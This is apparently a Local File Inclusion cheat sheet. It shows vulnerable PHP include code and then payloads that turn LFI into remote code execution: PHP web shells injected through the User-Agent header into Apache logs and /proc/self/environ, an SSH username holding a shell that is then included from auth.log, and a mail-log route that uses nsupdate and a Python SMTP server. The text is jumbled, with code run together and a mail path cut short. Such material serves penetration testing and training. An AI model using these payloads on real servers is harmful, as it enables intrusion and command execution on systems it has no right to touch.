An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even XSS.
Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.
Check for LFI
The following is an example of PHP code that is vulnerable to LFI.
/*** Get the filename from a GET input* Example - http://example.com/?file=filename.php*/$file = $_GET['file'];/*** Unsafely include the file* Example - filename.php*/include('directory/'. $file);
Used to read .PHP files. It is not possible to read a PHP file's content via LFI because PHP files get executed and never show the existing code. We can use the PHP filter to display the content of PHP files in other encoding formats such as base64 or ROT13.
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
Via Apache Log Files
# /var/log/apache2/access.log# set inside the user agent or inside a GET parameter a php shell like :<?php system($_GET['cmd']); ?># same for /proc/self/environ
via SSH
ssh<?phpsystem($_GET["cmd"]);?>@10.10.10.10# Then include the SSH log files inside the Web Application :# http://example.com/index.php?page=/var/log/auth.log&cmd=id
via MAIL
First send an email using the open SMTP then include the log file located at http://example.com/index.php?page=/var/log/mail.
nsupdate> server $ip_target $port_dns_target> key $key_algorithm:$name_key $secret> zone $dns_name> update add mail.$target_domain 86400 A $ip_host> send# start python smtpd server to receive mailpython3-msmtpd-cDebuggingServer-n $ip_host:25
